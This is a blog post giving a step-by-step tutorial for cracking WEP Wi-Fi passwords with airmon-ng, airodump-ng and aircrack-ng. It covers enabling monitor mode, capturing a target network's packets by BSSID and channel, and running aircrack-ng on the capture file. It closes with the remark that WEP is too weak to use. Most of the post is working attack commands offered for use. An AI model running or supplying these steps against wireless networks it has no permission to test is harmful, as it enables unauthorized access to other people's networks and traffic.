www.flickr.com
This is a Flickr badge showing items in a set called Gadgets and stuff. Make your own badge here.

Cracking Wired Equivalent Privacy (WEP)

Software what you need and where to get them

Airmon-ng For setting card to monitor mode.
Airodump-ng For capturing data for aircrack-ng.
Aircrack-ng For cracking password.

Main steps for cracking WEP

Finding and identificated which network you want to crack (kismet)

Collect data for cracking (airodump-ng)

Use that collected data and run aircrack-ng against it (aircrack-ng)

Get your wireless nic to monitor mode

First we have to check wireless nic modes:

# sudo airmon-ng

And if you see there example ath0 stop it:

# sudo airmon-ng stop ath0

Use airmon-ng to turn your wireless nic to monitor mode so it can receive packages:

# sudo airmon-ng start wifi

Collecting data with airodump-ng

# sudo airodump-ng -c 8 - -bssid 00:11:22:33:44:FF -w capture -i ath0
airodump-ng Name of that software what you run
-c Channel (From what channel you want to capture data)
-w Set the filename where airodump-ng saves captured data
-bssid bssid of that network which data you want to capture
-i Interface what you want to use for capturing data
–encrypt WEP Capturing data only from networks which are protected with WEP

If you are lazy and just want to capture everything on the air:

# sudo airodump-ng -w capture -i ath0

I normally use something between those:

# sudo airodump-ng -w capture -i ath0 --encrypt WEP

When you have captured some data packages from that network which you wanna crack you can leave airodump-ng running and capturing data and open new terminal window/tab and start to run aircrack-ng.

airodump ng 300x162 Cracking WEP

AiroDump-NG

Cracking WEP with aircrack-ng

# sudo aircrack-ng -m 00:19:E3:FC:57:E2 -n 128 capture.cap
# sudo aircrack-ng capture.cap

Gives you list of those wireless networks which data you have captured to capture.cap file and then you can choose which network you want to crack.

AriCrack-NG

AirCrack-NG

WEP is so easy to crack that you should never ever use it anywhere.

  • Twitter
  • Digg
  • Facebook
  • del.icio.us
  • LinkedIn
  • Slashdot
  • Google Bookmarks
  • HackerNews
  • Reddit
  • StumbleUpon
  • FriendFeed
  • PDF
  • email
  • Haohao
  • Identi.ca
  • Live
  • MSN Reporter
  • 豆瓣
  • 豆瓣九点
  • MySpace
  • Netvibes

Leave a Reply

 

 

 

You can use these HTML tags

<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>

CommentLuv Enabled